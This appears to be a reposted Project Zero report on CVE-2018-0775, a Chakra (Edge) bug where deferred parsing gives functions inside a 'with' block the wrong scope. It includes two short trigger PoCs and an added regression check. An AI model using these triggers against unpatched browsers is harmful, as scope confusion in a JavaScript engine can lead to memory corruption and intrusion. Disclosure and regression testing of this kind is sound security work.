Microsoft Edge: Chakra: Deferred parsing makes wrong scopes #2
CVE-2018-0775
Since the PoC is only triggerable when the "DeferParse" flag is enabled and requires a with statement, I think this is similar to issue 1310 (Microsoft Edge: Chakra: Deferred parsing makes wrong scopes; /p/project-zero/issues/detail?id=1310).
PoC:
    // Enable the flag using '\n'.repeat(0x1000)
    eval(`(function f() {
        with ({}) {
            (function () {
                print(f);
            })();
        }
    }());` + '\n'.repeat(0x1000));
PoC 2:
    // ./ch poc.js -ForceDeferParse
    (function f() {
        with ({}) {
            (function () {
                print(f);
            })();
        }
    }());
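The two PoCs differ only in how deferred parsing is triggered (padding the script versus a ch flag), so the useful regression check is differential: the binding that `f` resolves to inside the nested function must not change with script size. The following is an added example, not code from the original report; it assumes a JavaScript engine with a global `eval` (the `print` call from the PoC is replaced by returning the resolved value so the result can be inspected).

```javascript
// Added example (not from the original report): a scope-resolution
// regression check built on the PoC shape. It constructs the same
// named-function / with / inner-function nesting, optionally padded
// with newlines the way PoC 1 does to push the engine into deferred
// parsing, and reports which binding the inner function sees for 'f'.
// Note: no backticks inside the template, since it is a template literal.
const SOURCE_TEMPLATE = `(function f() {
  with (WITH_OBJECT) {
    return (function () {
      return f; // which 'f' does this resolve to?
    })();
  }
}())`;

// Returns "outer" if 'f' resolved to the named function expression's
// own binding, "with" if it resolved to a property of the with-object,
// or "other" for anything else (which would indicate a wrong scope chain).
function resolveF(withObjectExpr, paddingLines) {
  const src = SOURCE_TEMPLATE.replace('WITH_OBJECT', withObjectExpr)
    + '\n'.repeat(paddingLines);
  // Indirect eval runs the source as sloppy-mode global code, so the
  // with statement is legal even if this file itself is strict.
  const result = (0, eval)(src);
  if (typeof result === 'function' && result.name === 'f') return 'outer';
  if (result === 'shadow') return 'with';
  return 'other';
}

// Differential check: padding changes only whether the engine may parse
// the function lazily; the language's scope-chain semantics do not change,
// so eager and padded runs must agree.
function scopeIsStable(withObjectExpr) {
  const eager = resolveF(withObjectExpr, 0);
  const deferred = resolveF(withObjectExpr, 0x1000);
  return { eager, deferred, stable: eager === deferred };
}

// Expected per spec: {} -> "outer" (Object.prototype has no 'f'),
// { f: 'shadow' } -> "with" (the with-object shadows the outer binding).
console.log(scopeIsStable('{}'));
console.log(scopeIsStable("{ f: 'shadow' }"));
```

A `stable: false` result, or an `other` value in either column, is the symptom this report describes: the lazily parsed inner function was given a scope chain that differs from the eagerly parsed one.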
This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
Found by: lokihardt
- Written by: khalil shreateh